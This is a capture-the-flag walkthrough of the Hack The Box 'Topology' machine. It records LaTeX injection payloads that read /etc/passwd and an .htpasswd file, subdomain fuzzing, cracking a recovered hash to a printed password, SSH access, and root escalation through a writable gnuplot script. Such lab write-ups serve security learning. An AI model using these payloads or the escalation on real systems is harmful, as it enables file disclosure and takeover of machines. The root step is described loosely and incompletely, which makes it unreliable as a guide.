HACKTHEBOX - HackMD

# HACKTHEBOX # Topology ![](https://hackmd.io/_uploads/B1awJW-33.png) ## Creating Host `sudo vim etc/hosts/` add host as 10.10.11.217 topology.htb Link: http://topology.htb/ ## Scanning `nmap -A -sV 10.10.11.217` ![](https://hackmd.io/_uploads/SkZYyZ-2h.png) Visit http://topology.htb/ ![](https://hackmd.io/_uploads/HyntkZW33.png) Found LaTeX Equation Generator but couldn’t redirect so adding this host name in `etc/hosts/` Had no idea about this website so searched Latex equation vulnerabilities and found **[Formula/CSV/Doc/LaTeX Injection - HackTricks](https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=&cad=rja&uact=8&ved=2ahUKEwjxqeuszsyAAxVrzjgGHUAJC5EQFnoECA4QAQ&url=https%3A%2F%2Fbook.hacktricks.xyz%2Fpentesting-web%2Fformula-doc-latex-injection&usg=AOvVaw1n_NXF4m8WzMsGaABeQ7Vg&opi=89978449).** ![](https://hackmd.io/_uploads/HyF5y-Zhn.png) ![](https://hackmd.io/_uploads/SJ1o1Wb2h.png) Now I wanted to read files from Latex code generator command: `\input{/etc/passwd}` 💡 It's latex language issue , when I execute command its in "text" mode by adding $ it goes into "math mode" to calculate and execute equations command: `$\input{/etc/passwd}$` As we know /etc/passwd file is used **to keep track of every registered user that has access to a system.** command: `$\lstinputlisting{/etc/passwd}$` ![](https://hackmd.io/_uploads/HklzWW-hh.jpg) Nothing much could be found here, let’s scan for some directories. ## Scanning for Subdomains Command: `wfuzz -c --hc=404 --hw=545 -t 200 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ.topology.htb" http://topology.htb` ![](https://hackmd.io/_uploads/rk9wZZ-33.png) Add dev.topology.htb and stats.topology.htb to `etc/hosts/` ![](https://hackmd.io/_uploads/SJL2ZWbn2.png) Now we need to bypass this authenication, as we have seen this domain is running on Apache/2.4.41 ![](https://hackmd.io/_uploads/Hy3nbb-hh.png) 🔗 Bypass Apache/2.4.41 401 Unauthorized: [https://www.vidocsecurity.com/blog/401-and-403-bypass-how-to-do-it-right/](https://www.vidocsecurity.com/blog/401-and-403-bypass-how-to-do-it-right/) Command: `$\lstinputlisting{/var/www/dev/.htpasswd}$` ![](https://hackmd.io/_uploads/ByYpWZ-n2.png) Finally found a Hash as a .PNG file. ![](https://hackmd.io/_uploads/HkP0-Zbhn.png) Hash: `vdaisley : $apr1$1ONUB/S2$58eeNVirnRDB5zAIbIxTY0` ## Hash Cracking using John command: `john --wordlist=/usr/share/wordlists/rockyou.txt hash` ![](https://hackmd.io/_uploads/ryUyM--2h.png) Output `?:calculus20` ![](https://hackmd.io/_uploads/Sk1ezWb2n.png) As see in our initial Nmap scan we have few SSH ports open. ## Connect to SSH command: `ssh vdaisley@topology.htb` password: `calculus20` ![](https://hackmd.io/_uploads/ByXWG-Z33.png) For user flag command: `cat user.txt` Gaining Root access ![](https://hackmd.io/_uploads/SkxTZzZWh2.png) Nothing interesting found here, except a executable “pspy64”. 💡 pspy is a command line tool designed **to snoop on processes without need for root permissions**. command: `./pspy64` ![](https://hackmd.io/_uploads/BkAMfbb3n.png) ![](https://hackmd.io/_uploads/ry8QzW-32.png) command: `/opt/gnuplot` command: `ls` Output: `ls: cannot open directory '.': Permission denied` Create a file within gnuplot dir command bash-5.0$ `nano /opt/gnuplot/root.plt` Reverse Shell - root.plt must contain `system “chmod u+s”` command: `bash -p` ``` -p Turned on whenever the real and effective user ids do not match. Disables processing of the $ENV file and importing of shell functions. Turning this option off causes the effective uid and gid to be set to the real uid and gid. ``` command: `whoami` → root Obtained the root access. Now, move on to root dir. command: `cd /root` `ls` `cat root.txt` Here is the root flag Output: `bb6b6780329a215d36126b6d6af62f1f`